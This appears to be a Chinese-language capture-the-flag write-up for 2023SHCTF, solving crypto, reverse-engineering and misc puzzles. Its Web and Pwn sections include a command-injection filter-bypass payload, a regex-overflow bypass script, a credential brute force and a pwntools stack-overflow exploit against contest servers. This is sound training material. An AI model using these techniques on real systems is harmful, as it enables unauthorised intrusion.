2023SHCTF

发表于 2023-10-30 更新于 2024-03-08 分类于 Wp 阅读次数： Waline：本文字数： 9.7k 阅读时长 ≈ 35 分钟

2023SHCTF——Crypto——Wp

Week1

Crypto

Crypto_Checkin

1	QZZ\|KQbjRRS8QZRQdCYwR4_DoQ7~jyO>0t4R4__aQZQ9\|Rz+k_Q!r#mR90+NR4_4NR%>ipO>0s{R90\|SQhHKhRz+k^S8Q5JS5\|OUQZO}CQfp*dS8P&9R8>k?QZYthRz+k_O>0#>

base85 –> base64 –> base32 –> base16

flag{Th1s_1s_B4s3_3nc0d3}

I am very ok!

Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook! Ook! Ook. Ook? Ook. Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook? Ook. Ook? Ook! Ook. Ook? Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook! Ook! Ook. Ook? Ook! Ook! Ook! Ook!
Ook! Ook! Ook? Ook. Ook? Ook! Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook! Ook! Ook. Ook? Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook? Ook. Ook? Ook! Ook. Ook? Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook! Ook!
Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook!
Ook! Ook! Ook! Ook? Ook. Ook? Ook! Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook!
Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook!
Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook! Ook. Ook. Ook.
Ook! Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook! Ook. Ook.
Ook. Ook! Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook! Ook! Ook. Ook? Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook? Ook.
Ook? Ook! Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook?
Ook.

Ook解密得到flag{123456789}

really_ez_rsa

from Crypto.Util.number import getPrime, bytes_to_long

e = 65537
m = b''

p = getPrime(128)
q = getPrime(128)
n = p * q
m = bytes_to_long(m)
c = pow(m, e, n)

print("p =", p)
print("q =", q)
print("c =", c)
print("e =", e)

# p = 217873395548207236847876059475581824463
# q = 185617189161086060278518214521453878483
# c = 6170206647205994850964798055359827998224330552323068751708721001188295410644
# e = 65537

p,q都给了，白给

exp:

from Crypto.Util.number import *
import gmpy2

p = 217873395548207236847876059475581824463
q = 185617189161086060278518214521453878483
c = 6170206647205994850964798055359827998224330552323068751708721001188295410644
e = 65537

d = gmpy2.invert(e,(p-1)*(q-1))
m = pow(c,d,p*q)
print(long_to_bytes(m))
#flag{Y0ung_meiyou_xiaojj}

what_is_m

from Crypto.Util.number import bytes_to_long
from secret import flag

m = bytes_to_long(flag)
print("m =",m)

# m = 7130439814057451234816276827985624426378225444820448794672983850703174510423869748080084641434692304059989810437801952820137016591528446065914779069356815372089481476999952029232464963781245

更加白给，转字节就行了

exp:

from Crypto.Util.number import *
m = 7130439814057451234816276827985624426378225444820448794672983850703174510423869748080084641434692304059989810437801952820137016591528446065914779069356815372089481476999952029232464963781245
print(long_to_bytes(m))
#flag{Th3r3_ar3_53vEraL_a1terNAtIvEs_7o_tHe_1ON9_T0_6YteS_1UNCti0N_dCGb796e3dSB}

残缺的md5

1
2
3

苑晴在路边捡到了一张纸条，上面有一串字符串：KCLWG?K8M9O3?DE?84S9
问号是被污染的部分，纸条的背面写着被污染的地方为大写字母，还给了这串字符串的md5码值：F0AF????B1F463????F7AE???B2AC4E6
请提交完整的md5码值并用flag{}包裹提交

爆就完了

exp:

import string
import hashlib

s = "KCLWG?K8M9O3?DE?84S9"
table = string.ascii_letters + string.digits
for i in range(128):
    for j in range(128):
        for k in range(128):
            ss = "KCLWG" + chr(i) + "K8M9O3" + chr(j) + "DE" + chr(k) + "84S9"
            hash = hashlib.md5(ss.encode()).hexdigest().upper()
            if hash[:4] == "F0AF" and hash[-7:] == "B2AC4E6" and "B1F463" in hash:
                flag = "flag{" + hash + "}"
                flag1 = "flag{" + ss + "}"
                print(flag)
                print(flag1)
                
#flag{F0AF1443B1F463EAFFF7AEBB8B2AC4E6}
#flag{KCLWGXK8M9O3KDED84S9}

电信诈骗

1
2

050f000a7e407151537802540b747176075178027552756d0256726262627c
你好，我是秦始皇，我并没有死，我得到了长生不老药，但是药效有副作用，现在才醒。我刚花了一年在互联网上了解现在的时代，现在我要利用我地宫第四行第七列的无敌兵马俑军队卷土重来，但是我需要启动资金，vivo50作为启动资金，待我横扫天下，封你为大将军，赏你黄金万两！

先把这个16进制转字节

c = "050f000a7e407151537802540b747176075178027552756d0256726262627c"
cc = []
for i in bytes.fromhex(c):
    cc.append(i)
print(cc)

得到这个数组[5, 15, 0, 10, 126, 64, 113, 81, 83, 120, 2, 84, 11, 116, 113, 118, 7, 81, 120, 2, 117, 82, 117, 109, 2, 86, 114, 98, 98, 98, 124]

提示给出$47$和$50$两个数字，拿部分明文flag{进行各种运算，最后发现每个明文字符和密文字符异或$50$的差值都是$47$，即47 = m[i] - (cc[i] ^ 50)

1
2
3

m = b"flag{"
for i in range(5):
    print(m[i] - (cc[i] ^ 50))

所以m[i] = cc[i] ^ 50，这样就能恢复明文

但是！就这样操作的话，得到的是：flag{¡ry_hursdy_vv_o}，很明显有一些字符没有打出来

有一些明文的值是超出范围的，因为我们需要的值是在33~126中

所以要对超出126的值进行处理，把每个m的值打印出来

找一下规律发现，vv此处应该是vivo或者v1v0或者viv0或者v1vo，通过这样来找寻规律，最后通过v1v0找到了规律，要把超过126的值减去94

exp:

c = "050f000a7e407151537802540b747176075178027552756d0256726262627c"
cc = []
for i in bytes.fromhex(c):
    cc.append(i)
print(cc)

flag = ''
for i in range(len(cc)):
    mm = 47 + (cc[i] ^ 50)
    if mm > 126:
        mm -= 94
        flag += chr(mm)
    else:
        flag += chr(mm)
print(flag)
#flag{Cr42y_7hursd4y_v1v0_5o!!!}

佛说：只能四天

陀即我叻我莊如亦婆愍降吽兜哉念色夷嚩喼哉宣宣羅僧慧喼喃塞修菩哉菩哉吶宣囉哆念隸是喃哉嚩是念哉我嘚般訶尊是是闍哉訶咤聞訶念兜喼哉是般哉尊波祗迦念彌哆塞咤寂祗蜜劫塞迦劫諸隸菩哉缽即哉耨若夷夷吽斯空須囉諦諸須塞缽是若咤劫若哉嚴莊須哉闍須叻耨降菩哉般哆哉耨是叻色迦羅缽哉吽哉降聞叻彌蜜彌所斯嚴薩所陀波婆喃夷愍所囉哉叻伏空般耨囉隸劫般夷降嘇慧哆摩我念羅哉摩修叻喼羅般須吶囉尊伏斯若喼羅

新约佛论禅解密得到和谐公正和谐公正和谐法治和谐公正和谐法治和谐公正和谐平等和谐公正和谐公正和谐法治和谐公正和谐公正和谐公正和谐民主自由平等和谐敬业和谐和谐自由敬业自由敬业和谐和谐自由敬业和谐富强和谐敬业和谐爱国和谐公正和谐公正和谐公正和谐法治和谐公正和谐公正和谐公正和谐公正和谐公正和谐公正和谐法治和谐法治自由公正和谐法治自由法治和谐和谐和谐敬业自由爱国和谐民主和谐和谐自由法治自由公正和谐和谐自由法治

核心价值观解码得到66767656676661E93II3I098666766666677F7G39H13GF3G

一看很像16进制但是出现了G,H，估计要用凯撒，但是对比flag的十六进制是666c6167顺序似乎不对

先栅栏解密得到666F61677E6G697373696I6H5I6163636I6G706F6973687G，栅栏数为4，这样子和明文只差移位了

凯撒解密，移位量为3，得到666C61677B6D697373696F6E5F6163636F6D706C6973687D

16进制转字符flag{mission_accomplish}

黑暗之歌

1
2
3

密文：

⠴⡰⡭⡳⠴⡰⡭⡰⡷⡲⡢⡩⡭⡡⠯⡩⡭⡡⡺⡩⡭⡡⠳⡩⡭⡡⡺⡩⡭⡡⡶⡩⡭⡡⡶⡩⡭⡡⡲⡩⡭⡡⡺⡩⡭⡡⠯⡩⡧⡊⡢⡩⡭⡡⠯⡩⡭⡡⡺⡃⡰⠫⡋⡚⡲⡍⡋⡮⠴⡰⡭⡶⡷⡲⡢⡩⡧⡊⡢⡃⡴⡵⡋⡁⡬⡵⡋⡁⡬⡵⡋⡁⡬⡳⡋⠲⠴⡯⡃⡗⠴⡰⡭⡴⠴⡰⡭⡶⡷⡲⡢⡩⡧⡊⡢⡩⡭⡡⡺⡩⡭⡡⡺⡩⡭⡡⠳⡩⡧⡊⡢⡩⡭⡡⠯⡩⡧⡊⡢⡃⡴⡵⡋⡚⡱⠫⡋⡚⡱⠫⡋⡚⡲⠵⠲⡺⠰⠽

一眼盲文，找了很多网站解的都怪怪的，最后找到盲文点字加密/解密)，解密得到：

4pms4pmpwrbima/imazima3imazimavimavimarimazima/igJbima/imazCp+KZrMKn4pmvwrbigJbCtuKAluKAluKAlsK24oCW4pmt4pmvwrbigJbimazimazima3igJbima/igJbCtuKZq+KZq+KZrz0=

base64解密得到♬♩¶♯♬♭♬♫♫♪♬♯‖♯♬§♬§♯¶‖¶‖‖‖¶‖♭♯¶‖♬♬♭‖♯‖¶♫♫♯=

音符解密得到flag{b2cc-9091-8a29}

进制

1 2	好熟悉的进制，但不知道加密了几层 3636366336313637376236313638363636623661366336383662363136383764

两层16进制

flag{ahfkjlhkah}flag{ahfkjlhkah}

凯撒大帝

1	pvkq{mredsrkyxkx}

凯撒解密，移位量为10

flag{chutihaonan}

立正

1	wl hgrfhg 4gNUx4NgQgEUb4NC64NHxZLg636V6CDBiDNUHw8HkapH :jdoi vl vlkw ~xrb wd nrrT Y:

凯撒解密，移位量为3得到ti edoced 4dKRu4KdNdBRy4KZ64KEuWId636S6ZAYfAKREt8EhxmE :galf si siht ~uoy ta kooQ V:

发现edoced，意识到要把它逆序:V Qook at you~ this is flag: EmxhE8tERKAfYAZ6S636dIWuEK46ZK4yRBdNdK4uRKd4 decode it

观察中间的密文EmxhE8tERKAfYAZ6S636dIWuEK46ZK4yRBdNdK4uRKd4，对比flag{的base64密文：ZmxhZ3s

猜了很久最后知道，大写字母后移21位因为E–>Z，小写字母不动，数字前移5位，因为Qook at you–>Look at you

exp:

import base64

c = "EmxhE8tERKAfYAZ6S636dIWuEK46ZK4yRBdNdK4uRKd4"
m = ""
for i in range(len(c)):
    if c[i].isupper():
        mm = 65 + (ord(c[i]) - 65 + 21) % 26 
        m += chr(mm)
    if c[i].isdigit():
        mm = ord('0') + ((ord(c[i]) - ord('0') -5) % 10)
        m += chr(mm)
    if c[i].islower():
        m += c[i]
flag = base64.b64decode(m.encode())
print(flag)
#flag{Y0U_MU57_5t4nd_uP_r1gHt_n0W}

迷雾重重

题目描述：

morse？ASCII？


密文：

0010 0100 01 110 1111011 11 111 010 000 0 001101 00 000 001101 0001 0 010 1011 001101 0010 001 10 1111101

在线摩斯解密，得到FLAG{MORSE_IS_VERY_FUN}

忘了是大写还是小写

难言的遗憾

题目描述：
我们本可以早些进入信息化时代的，但是清政府拒不采纳那份编码规则。 （注：flag为中文，使用flag{}包裹提交）

密文：

000111310008133175592422205314327609650071810649

中文电码查询 Chinese Commercial Code - 标准电报码免费在线查询|姓名电码|美国签证电码 (mcdvisa.com)

flag{一天不学高数我就魂身难受}

小兔子可爱捏

题目描述：宇宙的终极答案是什么？

U2FsdGVkX1/lKCKZm7Nw9xHLMrKHsbGQuFJU5QeUdASq3Ulcrcv9

你可能会需要一把钥匙，钥匙就是问题的答案。

宇宙的终极答案是42，作为密钥，Rabbit解密

flag{i_love_technology}

熊斐特

1 2	熊斐特博士发现了一种新的密码。 uozt{zgyzhs xrksvi}

埃特巴什码

flag{atbash cipher}

Web

babyRCE

过滤了这么多字符，先用?rce=ls查看有什么文件

翻了一个大佬的博客MoeCTF刷题记录 | 雲流のLowest World (c1oudfl0w0.github.io)

得知用${IFS}代替空格，用ca\t代替cat

payload:

1	?rce=ca\t${IFS}fla?.php

但是！里面没有内容

用?rce=ls${IFS}/查看根目录

发现flag在根目录，最终的payload:

1	?rce=ca\t${IFS}/fla?

flag{662c515d-60c5-45a8-8a8c-86cee77e95a7}

飞机大战

一个网页小游戏，F12查看js文件

找到这个won函数，这串字符Unicode字符就是flag

Unicode解码得到:ZmxhZ3tkMTI0NDI4MS1jYjJjLTRmMjgtOWM0Ny1lOTcyM2YyMjNhMjF9

再base64解码：flag{d1244281-cb2c-4f28-9c47-e9723f223a21}

登录就给flag

用Burp Suite爆破账号密码

选择爆破模式

分别设置字典

最后发现账号是admin，密码是password

flag{925866f7-7753-4095-a900-9896c35a7988}

1zzphp

第一层用空数组绕过，第二层用正则溢出绕过

参考：雲流のLowest World

exp:

import requests

url = "http://112.6.51.212:32800/?num[]"

data = {'c_ode': 'very' * 250000 + '2023SHCTF'}
res = requests.post(url, data=data)
print(res.text)

生成你的邀请函

API：url/generate_invitation  
Request：POST application/json  
Body：{  
    "name": "Yourname",  
    "imgurl": "http://q.qlogo.cn/headimg_dl?dst_uin=QQnumb&spec=640&img_type=jpg"  
}

使用POST json请求来生成你的邀请函吧~~flag就在里面哦~~

用POSTMAN 传

Pwn

nc

nc上靶机，先ls看看有什么文件，发现有flag，直接cat

hard nc

先ls，再catflag，发现flag不在这里

想到flag文件可能被隐藏了，输入ls -a

发现有个提示gift，查看后发现是一半的flag

试着看gift2

但是gift2是个目录，进入gift2，输入ls，发现有flag2，查看后发现是base64编码后的flag，解码即可

flag{628975bc-8820-4a24-816f-99aa08049ce3}

口算题

要答对200题，肯定得用脚本

exp:

from pwn import *
host = '112.6.51.212'
post = 30847
GeShi = b'Press Enter to start...'  # 改格式！

sh = remote(host,post)
sh.sendline("")

data = sh.recvuntil(GeShi).decode()

for i in range(200):
    data1 = sh.recvuntil(b'=').decode()
    print(data1)

    a = data1.split("\n")[-1].split('=')[0]
    print("a:",a)
    if "÷" in a:
        a = a.replace("÷","/")
    if "×" in a:
        a = a.replace("×","*")
    print(eval(a))
    sh.sendline(str(eval(a)).encode())
    print(sh.recvline())
    print(sh.recvline())
    print(sh.recvline())
print(sh.recvall())
#flag{79305db4-72a0-44de-87c7-971c50632ceb}

showshowway

题目要求y和p相等，寻找一下p和y，发现p = showshowway

而y是一个大小为32的字符数组

网上划我们发现，传入的值存在s中，地址从06010C0截至到06010FF，长度为64（测试过了一个字符a占地址为1），而y的地址紧接着s，说明我们传入的第65个值会存入y

所以我们只要输入64个a+showshowway，即可让y和p相等

四则运算器

IDA发现有后面函数backdoor()

查看backdoor()的地址为0x4015E4

利用gets()函数不检查输入函数，所以存在栈溢出漏洞，再利用strlen()会被\x00截断

构造pyload:

from pwn import *
context(os='linux',arch='amd64',log_level= 'debug')

sh = remote("112.6.51.212",31342)
backdoor = 0x4015E4
pad = 0x32 + 8
payload = b'\x00' + b'A'*(pad-1) + p64(backdoor)

sh.sendline(payload)
sh.interactive()

Re

ez_asm

.text:0000000000401550                               var_4= dword ptr -4
.text:0000000000401550
.text:0000000000401550 55                            push    rbp
.text:0000000000401551 48 89 E5                      mov     rbp, rsp
.text:0000000000401554 48 83 EC 30                   sub     rsp, 30h
.text:0000000000401558 E8 33 01 00 00                call    __main
.text:0000000000401558
.text:000000000040155D C7 45 FC 00 00 00 00          mov     [rbp+var_4], 0
.text:0000000000401564 EB 4B                         jmp     short loc_4015B1
.text:0000000000401564
.text:0000000000401566                               ; ---------------------------------------------------------------------------
.text:0000000000401566
.text:0000000000401566                               loc_401566:                             ; CODE XREF: main+65↓j
.text:0000000000401566 8B 45 FC                      mov     eax, [rbp+var_4]
.text:0000000000401569 48 98                         cdqe
.text:000000000040156B 48 8D 15 AE 1A 00 00          lea     rdx, flag                       
.text:0000000000401572 0F B6 04 10                   movzx   eax, byte ptr [rax+rdx]
.text:0000000000401576 83 F0 1E                      xor     eax, 1Eh
.text:0000000000401579 89 C1                         mov     ecx, eax
.text:000000000040157B 8B 45 FC                      mov     eax, [rbp+var_4]
.text:000000000040157E 48 98                         cdqe
.text:0000000000401580 48 8D 15 99 1A 00 00          lea     rdx, flag                      
.text:0000000000401587 88 0C 10                      mov     [rax+rdx], cl
.text:000000000040158A 8B 45 FC                      mov     eax, [rbp+var_4]
.text:000000000040158D 48 98                         cdqe
.text:000000000040158F 48 8D 15 8A 1A 00 00          lea     rdx, flag                      
.text:0000000000401596 0F B6 04 10                   movzx   eax, byte ptr [rax+rdx]
.text:000000000040159A 83 E8 0A                      sub     eax, 0Ah
.text:000000000040159D 89 C1                         mov     ecx, eax
.text:000000000040159F 8B 45 FC                      mov     eax, [rbp+var_4]
.text:00000000004015A2 48 98                         cdqe
.text:00000000004015A4 48 8D 15 75 1A 00 00          lea     rdx, flag                      
.text:00000000004015AB 88 0C 10                      mov     [rax+rdx], cl
.text:00000000004015AE FF 45 FC                      inc     [rbp+var_4]
.text:00000000004015AE
.text:00000000004015B1
.text:00000000004015B1                               loc_4015B1:                             ; CODE XREF: main+14↑j
.text:00000000004015B1 83 7D FC 27                   cmp     [rbp+var_4], 27h ; '''
.text:00000000004015B5 7E AF                         jle     short loc_401566
.text:00000000004015B5
.text:00000000004015B7 48 8D 15 62 1A 00 00          lea     rdx, flag                      
.text:00000000004015BE 48 8D 0D 3B 2A 00 00          lea     rcx, Format                     ; "%s"
.text:00000000004015C5 E8 76 15 00 00                call    printf
.text:00000000004015C5
.text:00000000004015CA B8 00 00 00 00                mov     eax, 0
.text:00000000004015CF 48 83 C4 30                   add     rsp, 30h
.text:00000000004015D3 5D                            pop     rbp
.text:00000000004015D4 C3                            retn
.text:00000000004015D4

nhuo[M`7mc7uhc$7midgbTf`7`$7%#ubf7 ci5Y

让GPT把这段汇编代码转为C语言代码如下：

#include <stdio.h>

int main() {
    int var_4 = 0;
    char flag[] = "nhuo[M7mc7uhc$7midgbTf7`$7";

    while (var_4 <= 0x27) {
        char eax = flag[var_4];
        eax ^= 0x1E;
        char ecx = eax;
        flag[var_4] = ecx;

        eax = flag[var_4];
        eax -= 0x0A;
        ecx = eax;
        flag[var_4] = ecx;

        var_4++;
    }

    printf("%s\n", flag);

    return 0;
}

加密过程就是c[i] = flag[i] ^ 0x1E - 0x0A

解密就是flag[i] = (c[i] + 0x0A) ^ 0x1E

exp:

c = 'nhuo[M`7mc7uhc$7midgbTf`7`$7%#ubf7 ci5Y'
flag = ""
for i in c:
    m = (ord(i) + 0x0A) ^ 0x1E
    flag += chr(m)
print(flag)
#flag{It_is_als0_impor@nt_t0_13arn_4sm!}

easy_re

密文为des，加密过程为des[i] = (flag[i] >> 4) | (16 * flag[i])

因为flag[i]右移4位后只有3位，|上(16 * flag[i])（因为(16 * flag[i])的低4位都是0 ），所以des[i]的低3位就是flag[i]的高3位，再往前取4个就是flag[i]的低4位，拼接起来转字符即可

exp:

c = [0x66, 0x0C6, 0x16, 0x76, 0x0B7, 0x45, 0x27, 0x97, 0x0F5, 0x47, 0x3, 0x0F5, 0x37, 0x3, 0x0C6, 0x67, 0x33, 0x0F5, 0x47, 0x86,0x56, 0x0F5, 0x26, 0x96, 0x0E6, 0x16, 0x27, 0x97, 0x0F5, 0x7, 0x27, 0x3, 0x26, 0x0C6, 0x33, 0x0D6, 0x0D7,0x1B]

flag = ""
for i in c:
    bin_i = bin(i)[2:].zfill(8)
    mhigh = bin_i[-4:]
    mlow = bin_i[-8:-4]
    m = int(mhigh + mlow,2)
    flag += chr(m)
print(flag)
#flag{Try_t0_s0lv3_the_binary_pr0bl3m}

IDA打开

flag{flag1sinarray}

easy_math

print("Please input flag:")
flag = input()
if len(flag)!=42:
	print("Check your length!")
	exit()

l=[]
for i in range(6):
	s=""
	for j in flag[i*7:i*7+7]:
		s+=hex(ord(j))[2:]
	l.append(int(s,16))
if (
(593*l[0] + 997*l[1] + 811*l[2] + 258*l[3] + 829*l[4] + 532*l[5])== 0x5b8e0aef71d34ff43 and \
(605*l[0] + 686*l[1] + 328*l[2] + 602*l[3] + 695*l[4] + 576*l[5])== 0x551a262360964ef7f and \
(373*l[0] + 512*l[1] + 449*l[2] + 756*l[3] + 448*l[4] + 580*l[5])== 0x49d158a5657d6931c and \
(560*l[0] + 635*l[1] + 422*l[2] + 971*l[3] + 855*l[4] + 597*l[5])== 0x625568d5abbabf4f3 and \
(717*l[0] + 507*l[1] + 388*l[2] + 925*l[3] + 324*l[4] + 524*l[5])== 0x50ee0c025e70e3c23 and \
(312*l[0] + 368*l[1] + 884*l[2] + 518*l[3] + 495*l[4] + 414*l[5])== 0x40e735f8aa2815f65):
	print("Good job!")
else:
	print("Wrong\nTry again!!!")
	exit()

先解6个方程求出l[i]

再把l[i]转为16进制拼接即可

exp:

#sage
var('x0 x1 x2 x3 x4 x5')
f1 = 593*x0 + 997*x1 + 811*x2 + 258*x3 + 829*x4 + 532*x5== 0x5b8e0aef71d34ff43
f2 = 605*x0 + 686*x1 + 328*x2 + 602*x3 + 695*x4 + 576*x5== 0x551a262360964ef7f 
f3 = 373*x0 + 512*x1 + 449*x2 + 756*x3 + 448*x4 + 580*x5== 0x49d158a5657d6931c 
f4 = 560*x0 + 635*x1 + 422*x2 + 971*x3 + 855*x4 + 597*x5== 0x625568d5abbabf4f3 
f5 = 717*x0 + 507*x1 + 388*x2 + 925*x3 + 324*x4 + 524*x5== 0x50ee0c025e70e3c23 
f6 = 312*x0 + 368*x1 + 884*x2 + 518*x3 + 495*x4 + 414*x5== 0x40e735f8aa2815f65

ans = solve([f1,f2,f3,f4,f5,f6],[x0,x1,x2,x3,x4,x5])
# print(ans)
x0 = 28829613228248624
x1 = 26827458353261422
x2 = 13642136288051316
x3 = 29378135513658469
x4 = 32192963475959391
x5 = 30791965425607037
x = [x0,x1,x2,x3,x4,x5]

flag = ""
for i in x:
    flag += hex(i)[2:]
    
print(bytes.fromhex(flag))
#flag{N0_One_kn0ws_m@th_B3tter_Th@n_me!!!!}

ez_apk

反编译主函数，得知密文5TAYhycAPT1aAd535TGdWYQ8CvfoRjErGEreqhDpqv1LydTqd3mxuK2hhUp9Pws3u9mq6eX

通过关键部分得知，考点为换表base58码表9LfnoVpi1HrzBSKxhNFeyY745R2g3QmqsTCZJuDvcMdkE8wPGbUXajtAW6

密文5TAYhycAPT1aAd535TGdWYQ8CvfoRjErGEreqhDpqv1LydTqd3mxuK2hhUp9Pws3u9mq6eX

网站解密

flag{Jue_1_ju3_Y0ung_and_G0at_1s_go0d_for_yOuR_body}

seed

程序先是通过随机数种子，生成10个整数作为key，再把明文进行加密des[i] = m[i] ^ key[i % 10]

密文des为：

[0x40,0x29,0x28,0x0E9,0x0C2,0x4,0x0A4,0x0ED,0x9F,0x53,0x5F,0x75,0x3C,0x0D1,0x0CD,0x2B,0x0A8,0x0C4,0x89,0x69,0x15,0x21,0x16,0x0EF,0x0D7,0x27,0x92,0x0DF,0x0CA,0x53,0x5F,0x2A,0x3C,0x0D1,0x0CE,0x3,0x0A3,0x0EF,0x0A5,0x78,0x16,0x1A,0x2D,0x0E1,0x0C4,0,0,0]

注意这个3 dup(0)，意思是3个0

解题思路：通过动态调试，获得seed，通过seed，生成key，再解密

先在第24行设置断点

打开F9，调试，获得seed = 0u，即10进制的0

exp:

# include<stdio.h>
# include<stdlib.h>

void main(){
    int c[] = {0x40,0x29,0x28,0x0E9,0x0C2,0x4,0x0A4,0x0ED,0x9F,0x53,0x5F,0x75,0x3C,0x0D1,0x0CD,0x2B,0x0A8,0x0C4,0x89,0x69,0x15,0x21,0x16,0x0EF,0x0D7,0x27,0x92,0x0DF,0x0CA,0x53,0x5F,0x2A,0x3C,0x0D1,0x0CE,0x3,0x0A3,0x0EF,0x0A5,0x78,0x16,0x1A,0x2D,0x0E1,0x0C4,0,0,0};
    int v3,key[10];
    srand(0);
    for(int i=0;i <= 9;++i){
        v3 = rand() % 255;
        key[i] = v3;
        printf("%d\n",key[i]);
    }
    for(int i=0;i <= 44;++i){
        int m = key[i % 10] ^ c[i];
        printf("%c",m);
    }
}
#key = [38,69,73,142,185,67,205,155,250,12]
#flag{Give_y0u_the_se3d_and_D0_you_w@nt_t0_do}

MISC

message

0001000D91683106019196F40008C26211002072B975915730671B54114F60000A000A592982B15C065265843D8A938A00000A000A5E8A9AA453D883525730000A000A91527CBE518D6E1751656CEA75D5000A000A6C899ED852305BF94E0D8D77000A000A8FD94E0053CC624B535191195230002062B14F4F4F6000530048004300540046007B00620061003900370038003400300035002D0062003100630038002D0038003400370063002D0038006500360039002D006600360032003100370037006500340063003000380037007D

转16进制得到SHCTF{ba978405-b1c8-847c-8e69-f62177e4c087}

签到题

1	Wm14aFozdDBhR2x6WDJselgyWnNZV2Q5

两次base64

flag{this_is_flag}

社工

搜索关键词：一家幸运好玩的店，还有万达

搜索到探索合作经营新模式：山东首家自然人商业综合体店盛大开业 (lottery.gov.cn)

地图搜索山东东营西城万达广场，定位到山东省东营市东营区北一路附近，然后找到中国石油大学

可爱的派蒙

图片拖入010，发现后面有PK开头的内容，于是把图片后缀改为zip

发现里面有两个内容重合度很高的txt文件，然后想着找出不同，写了个脚本就出了

exp:

f1 = open('0.txt','r')
f2 = open('1.txt','r')
data1 = f1.readlines()
data2 = f2.readlines()

flag = ""
for i in range(len(data1)):
   line1 = data1[i]
  line2 = data2[i]
  for a,b in zip(line1,line2):
    if a != b:
      flag += b
      
print(flag)
#flag{4ebf327905288fca947a}

ezmisc

一大串二进制的值，发现长度是841，因为841 = 29*29，所以想到二维码

网上找了个二进制生成二维码的脚本

from PIL import Image
MAX = 29
pic = Image.new("RGB",(MAX, MAX))
str = "1111111011111111011000111111110000010011000101010001000001101110100011000110010010111011011101011010000100010101110110111010000111111000001011101100000100011101111010010000011111111010101010101010111111100000000000000111111100000000001011101000111010100100010010011000000101101111100010001110110010101001111010001110011101001001001100100010001000100110001001100010101001110100011010000110100110000001101111000001100111111000100101011111000110010000011111111111000111010110001110100100110011010011000011010000110011100100111011001110011010100110100111101101000110001001110101010010100100110001111101111111100010000000011110011010110001000011111110010000000001101010111100000101110100010101000100101011101011000001110011111111110111010010101001010000110100101110101111111011010001100011000001000111101111001001101011111110010100011110111100111"
i=0
for y in range (0,MAX):
    for x in range (0,MAX):
        if(str[i] == '1'):
            pic.putpixel([x,y],(0, 0, 0))
        else:
            pic.putpixel([x,y],(255,255,255))
        i = i+1
pic.show()
pic.save("flag.png")

扫了以后发现压缩包的密码是hit_k1sme4_4_fun

打开flag文件，发现有PK头，改后缀为zip

又一个加密文档，右边备注了一串二进制。把他二进制转字符串得到rockyou

想到rockyou字典，然后拿来爆破，最后得到密码是palomino

打开得到

ksgeylalssgSlHffgS{{gHklesgg{afkH{lHalSkgygf{{kfgslg1l11Ss{ellal{f{fka{l{gllaHf1elSsa14Hyl}f}Slmyfg4gleSlk1k{Sfggga4aHg}SlllgHHfgy1Sgaakfga1HmH{sylgs{ffkHyyaals{S{almklagfskyg{f1a1yffe{{SSSylHagf1{S{Ham{Sf}ga}fHlgl{aSl1{lkyfff}flkHffaagHegSaHSkafgH{ymaykSylS{{1llf{efeHfaalaSafflmSlylaslfk}mlllaaHSfk{SyH{yayyf{lyy1ylaff{aaygfl2333amSaeHy{fms{ySamkSga{ffylaalHlfgfglafHSSH{algmff1SSHHflSkSeygff14sgSl1ff41HkHaaal{k553klgfffmslk{Haylam{{llfggSlggaya{SaSg{lya{fflyaafk{aflkgay{kHg{fgkff1{akefeSlfmySkgglka{mSfmSemgykSSl1gfgHllgkygmfafmfakaaegafHgklSklaaH1HglgfeS41lgkS{ggaHmmSlfykfas4f{afgHaa{ylaf{{eHS4lHf{gfg{eSlSf{gsaSgyfSyHfHHagkSaS{{fa1yalsf{flf1f{{{fafakfsmaef4amHsyfSaH56789gfl{{{1yySlkael41Say{faffaSHy4Ss{eHyfmlykSm}{{ygaalgg{kHlHelffHasfaaf{SykfS666l{SS1{SygfgaHgSllf4effgHHykklSl1ga1lHafsy{f{141yaakllla1al4SaffgflalkSS1llg1{af{SyygsSSseHffemfHlaflfgkeag{gfSgmlkmflSlgHkSfylffllHya{ksgySlHHglg{H1lyf{f1gggHaffS{afalafg7825fakaSfyfg11gfHkfySsaaafff1{mfgalfa{gay1ySf{asHgg1HaHfkl1la11fsg{S11all{g{lyfHeala{f1agg{fHHglH1{SSfaSleyayaSy{yHylyHHl{ggayf}f11a{asf{gmf{{{SykHk1sSm1l}sgmSSff11a}SaSfHsmg}g{kallf{llHssl{ffsffagHgkHaa{f{f{alfglgaaS4sgHmkgSagl1lfSslfHyf{fglH{llfsaaSaglslgy11yfykHygf{lyfyfg}gafgSfaeg4fka{SaHllk{{fks{1f1S1gyl{fflkyllafHl1Sslgyga{llkHlHyaylgaf{skSH1yyfgf{Sfl